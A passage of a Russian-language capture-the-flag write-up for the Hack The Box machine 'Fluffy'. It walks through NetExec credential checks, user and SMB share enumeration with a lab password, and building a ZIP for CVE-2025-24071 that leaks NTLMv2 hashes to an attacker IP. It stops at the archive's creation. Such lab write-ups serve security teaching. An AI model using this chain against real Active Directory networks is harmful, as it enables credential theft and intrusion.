Се­год­ня я на наг­лядном при­мере покажу, как повысить при­виле­гии в Active Directory при помощи тех­ники ADCS ESC16. На пути к зах­вату сер­вера нас так­же ждет све­жая уяз­вимость в про­вод­нике Windows и ком­про­мета­ция цепоч­ки DACL.

На­ша конеч­ная цель — получе­ние прав супер­поль­зовате­ля на машине Fluffy с учеб­ной пло­щад­ки Hack The Box. Уро­вень задания — лег­кий.

Разведка

 

Сканирование портов

До­бав­ляем IP-адрес машины в /etc/hosts:

10.10.11.69 fluffy.htb

На этот раз, помимо IP-адре­са машины, нам дают учет­ку с пра­вами поль­зовате­ля домена.

Информация о машине

Пер­вым делом запус­каем ска­ниро­вание пор­тов.

Результат работы скрипта

Ска­нер нашел 11 откры­тых пор­тов:

  • 88 — Kerberos;
  • 135 — Microsoft RPC;
  • 139 — служ­ба сеан­сов NetBIOS, NetLogon;
  • 389 — LDAP;
  • 445 — SMB;
  • 464 — служ­ба сме­ны пароля Kerberos;
  • 593 (HTTP-RPC-EPMAP) — исполь­зует­ся в служ­бах DCOM и MS Exchange;
  • 636 — LDAP с шиф­ровани­ем SSL или TLS;
  • 3268 (LDAP) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру;
  • 3269 (LDAPS) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру через защищен­ное соеди­нение;
  • 5985 — служ­ба уда­лен­ного управле­ния WinRM.

Пер­вым делом про­верим выдан­ные учет­ные дан­ные при помощи ути­литы NetExec.

nxc smb 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!'
Результат проверки учетных данных

Нам уда­ется вой­ти от име­ни поль­зовате­ля j.fleischman.

 

Точка входа

У нас есть дей­ству­ющая учет­ная запись в домене, поэто­му получим спи­сок поль­зовате­лей. Иног­да в опи­сании учет­ных записей мож­но най­ти инте­рес­ную информа­цию.

nxc smb 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --users
Список пользователей

Сох­раним спи­сок поль­зовате­лей в файл на будущее, пос­ле чего прос­мотрим общие ресур­сы SMB.

nxc smb 10.10.11.69 -u 'j.fleischman' -p 'J0elTHEM4n1990!' --shares
Список общих каталогов SMB

Нам дос­тупен для чте­ния и записи каталог IT. Под­клю­чаем­ся к это­му катало­гу и прос­матри­ваем фай­лы.

smbclientng -d fluffy.htb -u 'j.fleischman' -p 'J0elTHEM4n1990!' --host 10.10.11.69
Список файлов в каталоге IT

По­мимо двух инстал­леров, там есть и файл PDF. Документ ока­зыва­ется отче­том о най­ден­ных уяз­вимос­тях, которые еще, веро­ятно, не запат­чены на хос­те.

Содержимое PDF-документа
 

Точка опоры

Из перечис­ленных уяз­вимос­тей поп­робу­ем про­экс­плу­ати­ровать CVE-2025-24071. Суть это­го бага в том, что при рас­паков­ке фай­ла из архи­ва RAR или ZIP про­вод­ник Windows авто­мати­чес­ки про­ана­лизи­рует фай­лы .library-ms. Если в теге <url> ука­зана ссыл­ка на SMB, то про­изой­дет авто­мати­чес­кая NTLM-аутен­тифика­ция на уда­лен­ном сер­вере. Это при­водит к утеч­ке NTLMv2-хеша поль­зовате­ля. Для соз­дания архи­ва вос­поль­зуем­ся скрип­том с GitHub.

python3 exploit.py -f exp -i 10.10.14.72
Создание ZIP-архива

